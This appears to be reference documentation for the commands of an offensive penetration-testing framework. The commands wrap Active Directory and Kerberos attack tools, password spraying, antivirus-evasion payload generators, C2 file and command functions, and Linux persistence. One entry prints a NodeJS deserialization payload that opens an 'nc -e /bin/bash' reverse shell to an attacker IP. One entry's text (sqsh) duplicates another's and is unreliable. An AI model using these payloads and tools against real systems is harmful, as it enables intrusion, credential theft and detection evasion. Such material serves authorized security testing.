This function attempts to locate and unzip a file in the sessions directory. If a filename is provided as line, it will use that; otherwise, it will attempt to retrieve a zip file name based on existing zip files in the user’s dictionary. If the zip file is not found or does not exist in the sessions path, it prints an error message.

Steps of execution: 1. Determines the zip file name from line or user dictionary. 2. Checks if the zip file exists within the sessions path. 3. Builds the unzip command and executes it to extract the contents of the zip file.

Usage example: unzip filename.zip

:param line: The zip filename to be extracted. If empty, a zip file will be selected automatically if available. :return: None

regeorg

Executes the reGeorg tool for HTTP(s) tunneling through a SOCKS proxy.

This function performs the following actions: 1. Checks if the reGeorg tool is installed; if not, it clones the repository and sets up the environment. 2. Validates the command line arguments, specifically the port and URL required for the SOCKS proxy. 3. Constructs the command to run the reGeorg SOCKS proxy with the specified options and executes it. 4. Provides usage instructions in case of incorrect command line argument formats.

Parameters: line (str): Command argument specifying the parameters for the reGeorg execution. - The expected format is: “ ”, where is the listening port and is the URL containing the tunnel script.

Returns: None

rocky

Reduces a wordlist based on the specified password length.

This function filters the provided wordlist to only include passwords that match the specified length. If no length is provided, it defaults to 4. The function constructs a grep command to achieve this and executes it.

Usage: do_rocky(line: str)

:param line: The length of the passwords to filter in the wordlist. This parameter should be a string representing a positive integer. If not provided, the function prompts the user for input. :type line: str :raises ValueError: If the provided length is not a valid positive integer.

Example: do_rocky(‘8’) # Executes: grep ‘^.{8}$’ /usr/share/wordlists/rockyou.txt > sessions/lazypass_mini_rocky.txt

pywhisker

Executes the pyWhisker tool for manipulating the msDS-KeyCredentialLink attribute of a target user or computer.

This function performs the following actions: 1. Checks if pyWhisker is installed; if not, it clones the repository. 2. Executes various actions on the msDS-KeyCredentialLink attribute, allowing actions like listing, adding, spraying, removing, clearing, exporting, or importing KeyCredentials for a specified target user or computer.

The command accepts different authentication options: - NTLM (Cleartext password or Pass-the-hash) - Kerberos (Cleartext password, Pass-the-key, Pass-the-cache)

Parameters: line (str): Command argument specifying the pyWhisker action and options. Expected format: - -t TARGET_SAMNAME or -tl TARGET_SAMNAME_LIST for the target account(s) - -a ACTION to specify the action (list, add, spray, remove, clear, info, export, import) - Optional flags for authentication and connection

Returns: None

owneredit

Executes the Impacket owneredit tool for manipulating ownership of Active Directory objects.

This function performs the following actions: 1. Prompts the user for necessary parameters if not provided. 2. Executes the command to change the owner of a specified target in Active Directory.

The command accepts the following parameters: - New owner (user) for the target object. - Target object to be manipulated. - Domain credentials for authentication. - DC IP address for the domain controller.

Parameters: line (str): Command argument specifying the new owner and target options. Expected format: - -new-owner NEW_OWNER for the new owner - -target TARGET_OBJECT for the target object - Required flags for authentication and connection

Returns: None

net_rpc_addmem

Executes the net rpc group addmem command to add a user to a specified group in Active Directory.

This function performs the following actions: 1. Prompts the user for necessary parameters if not provided. 2. Executes the command to add a user to a specified group in Active Directory.

The command accepts the following parameters: - Group name to which the user will be added. - User to be added to the group. - Domain credentials for authentication. - DC IP address for the domain controller.

Parameters: line (str): Command argument specifying the user and group options. Expected format: - “GROUP_NAME” for the group name - “$USER” for the user to add - Required flags for authentication and connection

Returns: None

pth_net

Executes the Pass-the-Hash (PTH) Net tool to change the password of an Active Directory account.

This function performs the following actions: 1. Prompts the user for necessary parameters if not provided. 2. Executes the command to change the password for the specified account using Pass-the-Hash authentication.

The command accepts the following parameters: - Target account for which the password will be changed. - New password to be set for the account. - Domain credentials for authentication. - DC IP address for the domain controller. - NTLM hash for Pass-the-Hash authentication.

Parameters: line (str): Command argument specifying the target account and new password options. Expected format: - ACCOUNT for the target account (default: ca_operator) - NEW_PASSWORD for the new password (default: newP@ssword2022) - Required flags for authentication and connection

Returns: None

gettgtpkinit_py

Executes the gettgtpkinit.py tool from PKINITtools to request a TGT using Kerberos PKINIT with a PFX or PEM certificate.

This function performs the following actions: 1. Checks if PKINITtools is installed; if not, it clones the repository and installs dependencies. 2. Requests a TGT using the specified PFX or PEM certificate and outputs the TGT to the specified ccache file.

Parameters: line (str): Command arguments specifying the certificate file and ccache location. Expected format: - domain/username ccache - Additional flags like -cert-pfx file, -pfx-pass password, -cert-pem file, etc.

Returns: None

getnthash_py

Executes the getnthash.py tool from PKINITtools to retrieve the NT hash using a Kerberos U2U TGS request.

This function performs the following actions: 1. Checks if PKINITtools is installed; if not, it clones the repository and installs dependencies. 2. Retrieves the NT hash using the AS-REP key from a previously generated TGT.

Parameters: line (str): Command arguments specifying the AS-REP key and target identity. Expected format: - identity - Additional flags like -key KEY, -dc-ip ip address, etc.

Returns: None

gets4uticket_py

Executes the gets4uticket.py tool from PKINITtools to request an S4U2Self service ticket using Kerberos.

This function performs the following actions: 1. Checks if PKINITtools is installed; if not, it clones the repository and installs dependencies. 2. Requests a service ticket using the S4U2Self protocol and outputs it to the specified ccache file.

Parameters: line (str): Command arguments specifying the kerberos_connection_url, SPN, target user, and ccache. Expected format: - kerberos_connection_url spn targetuser ccache - Additional flags like -v for verbose output.

Returns: None

aclpwn_py

Executes the aclpwn.py tool to find and exploit ACL paths for privilege escalation in an Active Directory environment.

This function performs the following actions: 1. Checks if aclpwn is installed; if not, it installs the package. 2. Finds an exploit path using specified starting and target points in Active Directory. 3. Executes the path to escalate privileges if the path is found.

Parameters: line (str): Command arguments specifying the find and target points, domain, and optional flags. Expected format: - -f starting_point -ft starting_type -d domain - Additional flags like -t target, -tt target_type, –server, -dry, –restore, etc.

Returns: None

addspn_py

Executes the addspn.py tool to manage Service Principal Names (SPNs) on Active Directory accounts via LDAP.

This function performs the following actions: 1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies. 2. Adds, removes, or queries SPNs on the specified target based on the provided options.

Parameters: line (str): Command arguments specifying the target hostname, user credentials, and SPN actions. Expected format: - hostname user password target spn -options - Options include: - -r to remove an SPN - -q to query current SPNs - -a to add SPN via msDS-AdditionalDnsHostName

Returns: None

dnstool_py

Executes the dnstool.py tool to modify Active Directory-integrated DNS records.

This function performs the following actions: 1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies. 2. Modifies DNS records by adding, removing, or querying based on the specified options.

Parameters: line (str): Command arguments specifying the DNS action, target record, and data. Expected format: - hostname user password record action -options - Options include: - -a to add a record - -r to remove a record - –forest to target ForestDnsZones

Returns: None

printerbug_py

Executes the printerbug.py tool to trigger the SpoolService bug via RPC backconnect.

This function performs the following actions: 1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies. 2. Executes the printerbug tool to attempt an RPC backconnect to the specified attacker host.

Parameters: line (str): Command arguments specifying the target and attacker host. Expected format: - target_username@target_host attacker_host

Returns: None

krbrelayx_py

Executes the krbrelayx.py tool for Kerberos relaying or unconstrained delegation abuse.

This function performs the following actions: 1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies. 2. Relays Kerberos tickets or abuses unconstrained delegation to access target services.

Parameters: line (str): Command arguments specifying the target and options. Expected format: - target options - Options include: - -t target_host to specify the target host - -l loot directory to save TGTs or dump information

Returns: None

autoblody

Executes the autobloody tool for automating Active Directory privilege escalation paths.

This function performs the following actions: 1. Checks if autobloody is installed; if not, it clones the repository and installs dependencies. 2. Executes the autobloody command to find and exploit privilege escalation paths.

Parameters: line (str): Command arguments specifying the source and target objects and options. Expected format: - -u username for NTLM authentication - -p password for NTLM authentication - –host domain_controller_ip for the IP of the Domain Controller - -dp neo4j_password for Neo4j database password - -ds source_label for the source node label in BloodHound - -dt target_label for the target node label in BloodHound

Returns: None

upload_gofile

Uploads a file to Gofile storage.

This function performs the following actions: 1. Prepares the file and folder ID for upload. 2. Sends a POST request to Gofile API with the file and authorization token. 3. Handles the response from the API and prints the result.

Parameters: line (str): Command arguments specifying the file path and options. Expected format: - - Options include: - –folderId to specify the folder where the file should be uploaded

Returns: None

unicode_WAFbypass

We open a Netcat listener on port 443 and attempt to exploit NodeJS deserialization by sending the
    following payload:
    {"rce":"_$$ND_FUNC$$_function() {require('child_process').exec('nc -e /bin/bash 10.10.xx.xx 443',function(error,stdout,stderr) {console.log (stdout) });

}()“} Some WAF can be bypassed with the use of unicode characters.

Generate an obfuscated payload, encode it in base64, and append the SSH public key to the authorized_keys file.
    
    Args:
        ip_address (str): The IP address for the reverse shell connection.
        port (int): The port for the reverse shell connection.
        ssh_public_key (str): The SSH public key to add to authorized_keys.
    
    Returns:
        str: The base64-encoded obfuscated payload.

sqli_mssql_test

Initiates a reverse MSSQL shell by starting an HTTP server to handle incoming connections and exfiltrate data.

This function does the following: 1. Starts an HTTP server to listen for connections from the MSSQL server. 2. Intercepts and decodes responses from the target server. 3. Prompts the user to enter commands, sends them to the target, and displays the output.

Parameters: line (str): Unused command argument from the cmd2 prompt.

Returns: None

targetedKerberoas

Executes the targetedKerberoast tool for extracting Kerberos service tickets.

This function performs the following actions: 1. Verifies the presence of the targetedKerberoast tool; if not installed, it clones the repository and installs dependencies. 2. Prompts for parameters such as the domain, username, and other configurations required by targetedKerberoast. 3. Executes the targetedKerberoast tool with specified options for obtaining “kerberoastable” hashes.

Parameters: line (str): Command arguments specifying the user, domain, and options. Expected format: - domain user hash or password [optional parameters]

Returns: None

pyoracle2

Executes the pyOracle2 tool for performing padding oracle attacks.

This function performs the following actions: 1. Verifies the presence of the pyOracle2 tool; if not installed, it clones the repository and installs dependencies. 2. Prompts the user for configuration parameters or retrieves them from self.params to create a job-specific configuration file. 3. Executes the pyOracle2 tool using the generated configuration file and specified options.

Parameters: line (str): Command arguments specifying additional tool options if required. Expected format: [optional parameters]

Returns: None

paranoid_meterpreter

Creates and deploys a paranoid Meterpreter payload and listener with SSL/TLS pinning and UUID tracking.

This function performs the following actions: 1. Generates a self-signed SSL/TLS certificate for payload encryption. 2. Creates either staged or stageless Meterpreter payloads with UUID tracking and TLS pinning. 3. Configures and launches a Metasploit listener for the payload.

Parameters: line (str): Command arguments specifying target configurations. Expected format: - rhost lhost domain subdomain

Returns: None

lfi

Exploits a potential Local File Inclusion (LFI) vulnerability by crafting and sending HTTP GET requests to a specified URL.

The user can specify the target URL directly via the line parameter or provide it interactively. If no URL is provided, the method uses a default value stored in self.params["url"]. Users are then prompted to specify the file to retrieve from the server, defaulting to /etc/passwd.

Args: line (str): Optional URL input provided directly in the command line. If not supplied, a default URL from self.params["url"] will be used.

Behavior: - Continuously prompts the user to specify a file to fetch via the target LFI vulnerability. - Sends a GET request to the constructed URL and prints the server’s response to the console. - Allows users to inspect different files on the target server by modifying the file path interactively.

greatSCT

Executes the GreatSCT tool for generating payloads that bypass antivirus and application whitelisting solutions.

This function performs the following actions: 1. Verifies the presence of the GreatSCT tool; if not installed, it clones the repository and installs dependencies. 2. Configures and generates the payload using user-provided or default parameters. 3. Executes the GreatSCT tool with the specified options.

Parameters: line (str): Command arguments specifying additional tool options if required. Expected format: [–ip –port –tool –payload ]

Returns: None

sqsh

Executes the Impacket sqsh tool for manipulating ownership of Active Directory objects.

This function performs the following actions: 1. Prompts the user for necessary parameters if not provided. 2. Executes the command to change the owner of a specified target in Active Directory.

The command accepts the following parameters: - New owner (user) for the target object. - Target object to be manipulated. - Domain credentials for authentication. - DC IP address for the domain controller.

Parameters: line (str): Command argument specifying the new owner and target options. Expected format: - -new-owner NEW_OWNER for the new owner - -target TARGET_OBJECT for the target object - Required flags for authentication and connection

Returns: None

setoolKits

Executes the SEToolKit workflow to generate a Meterpreter payload and configure the multi-handler using LHOST and LPORT from self.params.

Usage: do_setoolKits

Arguments: None: LHOST and LPORT are retrieved from self.params.

Workflow: 1. Launches SEToolKit. 2. Navigates to option 1 (Social-Engineering Attacks). 3. Selects option 9 (Powershell Alphanumeric Shellcode Injector). 4. Configures LHOST and LPORT using values from self.params. 5. Generates a Meterpreter reverse HTTPS payload. 6. Configures a multi-handler to listen for incoming connections.

jwt_tool

Uses the jwt_tool to analyze, tamper, or exploit JSON Web Tokens (JWTs).

This function performs the following actions: 1. Verifies the presence of jwt_tool; if not installed, it clones the repository and installs dependencies. 2. Accepts a JWT token as input or uses the provided argument for analysis. 3. Executes jwt_tool with the specified options and prints the results.

Parameters: line (str): Command argument containing a JWT token to analyze. If not provided, prompts the user for a token.

Returns: None

darkarmour

Uses the darkarmour tool to generate an undetectable version of a PE executable.

This function performs the following actions: 1. Verifies the presence of darkarmour; if not installed, it clones the repository and installs dependencies. 2. Prompts the user for various options to customize the tool’s behavior. 3. Constructs a command to run darkarmour with the selected options. 4. Executes darkarmour to generate the output file with the desired level of obfuscation.

Parameters: line (str): Command line arguments for the tool.

Returns: None

osmedeus

Executes Osmedeus scans with guided input for various scanning scenarios.

This function performs the following actions: 1. Verifies the presence of Osmedeus; if not installed, it clones the repository and installs the required dependencies. 2. Guides the user through selecting the type of scan, target, and any additional parameters needed for the scan. 3. Constructs and executes the appropriate Osmedeus command.

Parameters: line (str): Command-line arguments for the tool. If not provided, interactive input will be used.

Returns: None

metabigor

Executes Metabigor commands for OSINT and scanning tasks with guided input or predefined arguments.

This function performs the following actions: 1. Verifies the presence of Metabigor; if not installed, it clones the repository and installs the required dependencies. 2. Guides the user through selecting the type of task (IP discovery, related domains, scan, etc.), target, and additional parameters. 3. Constructs and executes the appropriate Metabigor command based on the user’s input or the provided argument.

Parameters: line (str): Command-line arguments for Metabigor. If not provided, interactive input will be used.

Returns: None

ip2asn

Command to get ASN for a given IP address.

atomic_tests

Executes Atomic Red Team tests based on user-selected platform and test.

This function performs the following actions: 1. Verifies the presence of the Atomic Red Team repository; if not present, it clones it locally. 2. Prompts the user to select a target platform, filtering the available tests to only those compatible. 3. Displays the filtered tests, including their description and platform compatibility. 4. Allows the user to select and execute a test or specify parameters directly.

Parameters: line (str): Command-line arguments for specifying a test ID or additional parameters. If not provided, interactive input will be used.

Returns: None

atomic_gen

Generates test and cleanup scripts for a given Atomic Red Team technique ID.

Parameters: line (str): The technique ID.

Returns: None

atomic_agent

Generates and synchronizes atomic agent scripts.

Parameters: line (str): Command-line arguments (not used in this function).

Returns: None

mitre_test

Interacts with the MITRE ATT&CK framework using the STIX 2.0 format.

This function connects to a locally cached or downloaded ATT&CK dataset in STIX 2.0 format. It allows the user to explore tactics, techniques, and procedures (TTPs) and filter them based on specific criteria, such as platform or tactic.

Parameters: line (str): User input, which may specify filters or actions, such as a tactic name or technique ID.

Usage: mitre_test list # Lists all tactics and techniques mitre_test tactic # Lists techniques for a specific tactic mitre_test technique # Shows details of a specific technique

bbot

Executes a BBOT scan to perform various reconnaissance tasks.

This function leverages BBOT, a reconnaissance tool, to perform tasks such as subdomain enumeration, email gathering, web scanning, and more. It dynamically determines the operation based on user input and executes the appropriate BBOT commands.

Parameters: line (str): User input specifying the target and optional presets or configurations.

Usage: bbot -t -p

Examples: bbot -t evilcorp.com -p subdomain-enum bbot -t evilcorp.com -p email-enum spider web-basic

amass

Executes Amass to perform a passive enumeration on a given domain.

This function performs the following steps: 1. Executes the Amass tool with the provided domain for passive enumeration. 2. Saves the results to a file named ‘results.txt’ in the current directory.

Parameters: line (str): The domain to be enumerated, e.g., ‘example.com’.

Returns: None

filtering

Applies various filtering techniques to the given command line by modifying each character or word appropriately.

This function takes any command and generates variations of it using several filtering techniques, including: 1. Quote filtering. 2. Slash filtering.

Parameters: line (str): The input command to be filtered.

Returns: None

lol

Exploits a target by injecting a malicious payload and collecting admin information.

This function performs the following steps: 1. Logs in to the application with provided credentials. 2. Injects a malicious payload to elevate the role of a user to ‘admin.’ 3. Executes a secondary payload to exfiltrate admin tokens by abusing ‘/api/info.’ 4. Prepares for further exploitation using ‘/admin’ and ‘/api/json-rpc’.

Parameters: line (str): Additional parameters for the target.

Returns: None

utf

Encode a given payload into UTF-16 escape sequences.

This function takes a payload string and encodes each character into its UTF-16 hexadecimal representation (e.g., A becomes A). If no payload is provided as input, it prompts the user to input one, with a default value of ' or 1=1-- -.

Parameters: line (str): The input payload to encode. If empty, the user is prompted to provide one interactively.

Returns: None: The encoded payload is printed to the console.

dcomexec

Executes the Impacket dcomexec tool to run commands on a remote system using DCOM.

This function performs the following actions: 1. Validates the target host (rhost) and domain parameters. 2. If the line argument is “pass”, it searches for credential files with the pattern credentials*.txt, allows the user to select credentials, and constructs the dcomexec command using them. 3. If the line argument is “hash”, it searches for a hash file, prompts the user for a username, and constructs the dcomexec command using the hash. 4. If line does not match “pass” or “hash”, it displays an error message with usage instructions.

Parameters: line (str): A command argument to determine the authentication mode. If “pass”, the function searches for credential files and authenticates using the selected file. If “hash”, it uses a hash file for authentication. If neither, it prints an error message with usage instructions.

Returns: None

pip_repo

Sets up a local pip repository to serve Python packages for installation on a compromised machine without internet access.

This function performs the following steps: 1. Creates necessary directories for the pip repository. 2. Checks for the presence of pip-compile and installs it if missing. 3. Downloads a predefined list of Python packages to the local repository. 4. Compiles the requirements for each package and downloads the compiled dependencies. 5. Organizes the downloaded packages into a structured directory format. 6. Generates an index for the pip repository. 7. Serves the pip repository over HTTP, allowing the compromised machine to install packages from this local repository.

Parameters: line (str): Command line input (not used in this function).

Returns: None

Example Usage:

pip_repo

apt_repo

Creates a comprehensive local APT repository with enhanced dependency resolution.

Improvements: 1. More robust dependency and metadata handling 2. Better error checking and logging 3. Comprehensive package and dependency management

Parameters: line (str): A space-separated list of package names to include in the repository.

Returns: None

httprobe

Executes the httprobe tool to probe domains for working HTTP and HTTPS servers.

This function performs the following actions: 1. Verifies if httprobe is installed; if not, it installs the tool automatically. 2. Probes domains from the input file or standard input. 3. Simplifies the user experience by minimizing required commands and leveraging self.params for defaults.

Parameters: line (str): Optional command arguments specifying the domain or just httprobe. Example usage: just provide the domain: httprobe example.com

Returns: None

eyewitness_py

Automates EyeWitness installation and execution without requiring user input.

This function installs EyeWitness if it is not already available, uses a default input file (urls.txt), and applies standard configurations to execute a web enumeration task automatically. No arguments or manual intervention are needed from the user.

Behavior: - Installs EyeWitness if missing. - Uses urls.txt as the default input file. - Sets a default timeout of 60 seconds. - Automatically executes EyeWitness with predefined settings.

Usage: witness

pup

Processes HTML content from a specified URL using the pup utility and a default CSS selector.

This function: - Retrieves HTML content from the URL stored in self.params["url"] using curl. - Filters the HTML content using the pup utility with a predefined CSS selector. - Displays the filtered result in the terminal.

Behavior: - Requires pup to be installed. - Uses self.params["url"] as the source URL. - Applies the CSS selector ‘table table tr:nth-last-of-type(n+2) td.title a’ by default.

Usage: pup

recon

Performs reconnaissance on a specified domain using crt.sh (the target must be visible on internet), pup, httprobe, and EyeWitness.

This function automates the process of gathering subdomains for a given domain, verifying their reachability, and generating a report using the EyeWitness tool.

Workflow: 1. Determines the target domain from the line argument or defaults to self.params["domain"]. 2. Queries the crt.sh certificate transparency logs for subdomains using curl. 3. Filters and extracts domain-related text data using pup. 4. Sorts and removes duplicate entries, then validates subdomains with httprobe. 5. Saves the results to a temporary file. 6. Executes EyeWitness to generate a web-based reconnaissance report for the subdomains.

Requirements: - pup: A command-line HTML parser. - httprobe: A tool to check live HTTP/HTTPS endpoints. - EyeWitness: A tool for generating web reconnaissance reports.

Parameters: line (str): The domain to target for reconnaissance. If omitted, the domain defaults to self.params["domain"].

Examples: 1. Specify a domain directly: >>> recon domain.com

  1. Use the default domain from self.params: >>> recon Raises: None. Errors in execution will be logged or printed as part of the command output.

digdug

Executes Dig Dug to inflate the size of an executable file, leveraging pre-configured settings and interactive input for minimal user effort.

This function integrates with the Dig Dug tool to increase an executable’s size by appending dictionary words. It automates repository setup, selects the input file from user prompts or defaults, and uses sensible configurations to execute the inflation process. Dig Dug is particularly useful for evading AV/EDR detections by exceeding size thresholds for analysis.

Behavior: - Automatically clones the Dig Dug repository if not already present in external/.exploit/DigDug. - Calls the venom command to prepare the necessary payloads for execution. - Prompts the user to select an input executable and specify the desired size increase. - Uses a default dictionary (google-10000-english-usa-gt5.txt) for padding.

Requirements: - A Python environment with required dependencies. - Executable files available in the working directory or sessions.

Usage: Invoke this function to inflate the size of a generated payload or user-specified executable. Interactive prompts will guide the input selection and size configuration.

Examples: 1. Increase the size of a selected payload by 100 MB: >>> digdug

  1. Use the default configurations to inflate an executable: No additional parameters are required. The user is prompted for size and file selection.

adsso_spray

Performs a password spray attack on Azure Active Directory Seamless Single Sign-On (SSO) using a specified list of users.

This function automates the process of spraying a given password across multiple user accounts in a target domain. It utilizes a user list in the form of a text file, targeting Azure AD Seamless SSO endpoints. The results are processed and saved to a specified output file, providing insights into which accounts were successful or failed during the attack.

Requirements: - A valid domain and URL for the target Azure AD instance. (assing url https://url.com) - A user dictionary file containing usernames (without the domain) to be sprayed.

Parameters: line (str): Command-line input passed to the function (not currently used in the function).

Behavior: - Loads the domain and URL from the configuration stored in self.params. - Reads the user list from a file specified in get_users_dic. - Sprays the specified password to all users and processes the results. - Saves the successful and failed attempts to the output file.

Example: - Perform a password spray attack with the password “admin” and save the results: >>> adsso_spray - Customize the password or user list by modifying self.params before invoking the function.

creds_py

Searches for default credentials associated with a specific product or vendor, using the Default Credentials Cheat Sheet.

This function automates the process of querying the Default Credentials Cheat Sheet for default credentials of various products. It searches for the specified product or vendor, providing relevant default credentials for pentesters during engagements.

Behavior: - Automatically clones the Default Credentials Cheat Sheet repository if not already present in external/.exploit/DefaultCreds. - Executes a search command with the product/vendor specified by the user. - Returns the default credentials for the requested product or vendor.

Requirements: - Python environment with necessary dependencies. - Access to the Default Credentials Cheat Sheet repository.

Usage: Run this function to search for default credentials related to a product or vendor. The user is prompted to enter the product/vendor for which they need credentials.

Examples: 1. Search for default credentials of ‘tomcat’: >>> creds search tomcat

sshexploit

Exploits OpenSSH vulnerability CVE-2023-38408 via the PKCS#11 feature of the ssh-agent.

Steps: 1. Attacker connects via SSH to a target server. 2. Identify and export the SSH_AUTH_SOCK environment variable. 3. Send crafted shellcode to exploit the PKCS#11 vulnerability. 4. Load malicious libraries via ssh-add and trigger SIGSEGV for code execution.

Usage: do_sshexploit

Example: do_sshexploit

Note: This function is for educational purposes only. Unauthorized exploitation is illegal.

tab

Executes the lazypyautogui.py script with optional arguments. This open new terminal tab and then run and instance of LazyOwn strokes the keyboard with pyautogui

If a line argument is provided, it appends the argument to the command. Otherwise, it runs the script without additional parameters. The constructed command is displayed and executed in the system shell.

Parameters: line (str): Optional argument to pass as input to the lazypyautogui.py script.

Returns: None

excelntdonut

Generates an Excel 4.0 (XLM) macro from a provided C# source file using EXCELntDonut.

This function: - Installs EXCELntDonut dependencies if not already installed. - Clones the EXCELntDonut repository if not present. - Compiles the provided C# source file into shellcode. - Generates the XLM macro and saves it to a specified output file.

Behavior: - Requires mono-complete and pip3 with required Python packages installed. - Accepts parameters for input file, references, sandbox checks, obfuscation, and output file. - Outputs the generated macro in a .txt or .csv format.

Usage: excelntdonut -f <source_file.cs> -r [–sandbox] [–obfuscate] [-o ]

Example: excelntdonut -f payload.cs -r System.Windows.Forms.dll –sandbox –obfuscate -o macro.txt

spraykatz

Executes the Spraykatz tool to retrieve credentials on Windows machines and large Active Directory environments.

This function: - Installs Spraykatz if not already installed. - Executes the Spraykatz command with the provided parameters. - Displays the result in the terminal.

Behavior: - Requires python3, python3-pip, git, and nmap to be installed. - Uses parameters from self.params for username, password, and target.

Usage: spraykatz

caldera

Installs and starts the Caldera server.

This function: - Clones the Caldera repository recursively. - Installs the required dependencies. - Optionally installs GoLang (1.19+). - Starts the Caldera server with the provided parameters.

Behavior: - Requires git, python3, and pip3 to be installed. - Uses parameters from self.params for version/release.

Usage: caldera

ntpdate

Synchronizes the system clock with a specified NTP server.

This method constructs the target NTP server address using the domain and subdomain parameters. It then prompts the user to confirm or modify the target address. Finally, it executes the ntpdate command to synchronize the system clock with the specified NTP server.

:param line: The command line input (not used in this method). :type line: str :return: None

ticketer

Executes the Impacket ticketer tool to create a golden ticket.

This function performs the following actions: 1. Checks if the target host is valid. 2. Prompts the user for the NTLM hash, domain SID, domain name, DC IP, SPN, and username. 3. Constructs and executes the Impacket ticketer command with the provided information.

Parameters: line (str): A command argument to determine the authentication mode. This parameter is not used in this function.

Returns: None

Displays a list of useful links and allows the user to select and copy a link to the clipboard.

This function performs the following actions: 1. Defines a list of links with their aliases. 2. Filters the links based on the input line if provided. 3. Displays the filtered links with their aliases and URLs. 4. Prompts the user to select a link by entering the corresponding number. 5. Copies the selected link to the clipboard.

Parameters: line (str, optional): A string to filter the links. If provided, only the links containing the string in their alias or URL will be displayed. Defaults to an empty string.

Returns: None

rsync

Synchronizes the local “sessions” directory to a remote host using rsync, leveraging sshpass for automated authentication.

Steps: 1. Verifies if the credentials file exists in the “sessions” directory. If not, prompts the user for a username and password. 2. Reads the credentials file if it exists and extracts the username and password. 3. Constructs an rsync command to deploy the “sessions” directory to the remote host. 4. Executes the rsync command using the system shell.

Args: line (str): Input command line (not used in the current implementation).

Dependencies: - The sshpass command-line tool must be installed on the local machine. - rsync must be installed on both the local and remote machines. - The remote host must be accessible via SSH.

Attributes: - self.params: Dictionary containing the following keys: - username (str, optional): Predefined username. Defaults to prompting the user if not provided. - password (str, optional): Predefined password. Defaults to prompting the user if not provided. - rhost (str): Remote host’s IP or domain name.

Raises: - KeyError: If rhost is not provided in self.params. - FileNotFoundError: If the “sessions” directory does not exist.

Note: - The credentials.txt file, if present, should have credentials in the format username:password on the first line.

Returns: None

pre2k

Executes the pre2k tool to query the domain for pre-Windows 2000 machine accounts or to pass a list of hostnames to test authentication.

This function: - Installs pre2k if not already installed. - Executes the pre2k command with the provided parameters. - Displays the result in the terminal.

Behavior: - Requires python3, python3-pip, and git to be installed. - Uses parameters from self.params for domain, username, password, and target.

Usage: pre2k auth -u -p -d -dc-ip pre2k unauth -d -dc-ip -inputfile

gmsadumper

Executes the gMSADumper tool to read and parse gMSA password blobs accessible by the user.

This function: - Installs gMSADumper if not already installed. - Executes the gMSADumper command with the provided parameters. - Displays the result in the terminal.

Behavior: - Requires python3, python3-pip, and git to be installed. - Uses parameters from self.params for domain, username, password, and target.

Usage: gmsadumper -u -p -d gmsadumper -u -p -d -l gmsadumper -k -d -l

dnschef

Executes the DNSChef tool to monitor DNS queries and intercept responses.

This function: - Installs DNSChef if not already installed. - Executes the DNSChef command with the provided parameters. - Displays the result in the terminal.

Behavior: - Requires python3, python3-pip, and git to be installed. - Uses parameters from self.params for domain, username, password, and target.

Usage: dnschef

dploot

Executes the dploot tool to loot DPAPI related secrets from local or remote targets. Actions: backupkey,blob,browser,certificates,credentials,machinecertificates,machinecredentials,machinemasterkeys,machinevaults,masterkeys,mobaxterm,rdg,sccm,vaults,wam,wifi This function: - Installs dploot if not already installed. - Executes the dploot command with the provided parameters. - Displays the result in the terminal.

Behavior: - Requires python3, python3-pip, and git to be installed. - Uses parameters from self.params for domain, username, password, and target.

Usage: dploot -d -u -p -t dploot -k -d -t

banners

Extract and display banners from XML files in the ‘sessions’ directory.

This function searches for XML files in the ‘sessions’ directory and extracts banner information from each file. The banner information includes the hostname, port, protocol, extra details, and service. If no XML files are found, an error message is displayed.

Args: line (str): Not used in this function.

Returns: None

Example: banners

createpayload

Generates an obfuscated payload to evade AV detection using the payloadGenerator tool. thanks to smokeme

This function: - Clones the payloadGenerator repository if not already cloned. - Installs .NET Framework 4.5 if not already installed. - Executes the generator.py script with the provided IP, port, and XOR key. - Displays the result in the terminal. Parameters: line (str): lenght of xor key Behavior: - Requires git and dotnet to be installed. - Uses parameters from self.params for IP, port, and XOR key.

Usage: createpayload

bin2shellcode

Converts a binary file to a shellcode string in C or Nim format.

This function: - Reads a binary file and converts its contents to a shellcode string. - Supports both C and Nim formats. - Displays the result in the terminal and saves it to a file.

Behavior: - Requires the filename, width, quotes, and format parameters. - Uses default values if parameters are not provided. - Uses parameters from self.params for filename, width, quotes, and format.

Usage: bin2shellcode [ [ [ []]]] bin2shellcode sessions/shellcode.bin 20 True c

news

Show the Hacker News in the terminal.

Parameters: line (str): optional Return None

vulns

Scan for vulnerabilities based on a provided service banner.

This function initializes a vulnerability scanner and searches for CVEs (Common Vulnerabilities and Exposures) related to the specified service banner. If no service banner is provided, it prompts the user to enter one.

Args: line (str): The service banner to search for vulnerabilities. If not provided, the user will be prompted to enter one.

Returns: None

Example: do_vulns “ProFTPD 1.3.5”

exe2bin

Trasnform file .exe into binary file.

Args: line (str): Ruta del archivo ejecutable .exe.

Return shellcode.bin file in sessions directory

atomic_lazyown

Genera y ejecuta pruebas de Atomic Red Team usando el C2.

Parameters: line (str): Lista de IDs de técnicas separadas por espacios.

Returns: None

upload_file_to_c2

Sube un archivo al C2.

Parameters: file_path (str): Ruta del archivo a subir.

Returns: None

download_file_from_c2

Descarga un archivo desde el C2.

Parameters: file_name (str): Nombre del archivo a descargar. clientid (str): Identificador del cliente (opcional).

Returns: None

issue_command_to_c2

Ejecuta un comando en el cliente usando el C2.

Parameters: command (str): Comando a ejecutar.

Returns: None

ofuscatorps1

Obfuscates a PowerShell script using various techniques. by @JoelGMSec https://github.com/JoelGMSec/Invoke-Stealth/ rewite in python by grisun0 This function: - Displays a banner and help information if requested. - Validates the provided parameters. - Executes all obfuscation techniques on the input PowerShell script by default. - Displays the result in the terminal.

Behavior: - Requires python3 to be installed for certain techniques. - Uses parameters from the command line for the script path and optional flags.

Usage: ofuscatorps1 [-nobanner]

Techniques: - Chameleon: Substitute strings and concatenate variables. - BetterXencrypt: Compresses and encrypts with random iterations. - PyFuscation: Obfuscate functions, variables, and parameters. - ReverseB64: Encode with base64 and reverse it to avoid detections. - PSObfuscation: Convert content to bytes and compress with Gzip. - All: Sequentially executes all techniques described above.

d3monizedshell

Executes the D3m0n1z3dShell tool for persistence in Linux.

This function: - Installs D3m0n1z3dShell if not already installed. - Executes the D3m0n1z3dShell command with the provided parameters. - Displays the result in the terminal.

Behavior: - Requires git and curl to be installed. - Uses a one-liner installation method for simplicity.

Usage: d3monizedshell

scp

Copies the local “sessions” directory to a remote host using scp, leveraging sshpass for automated authentication.

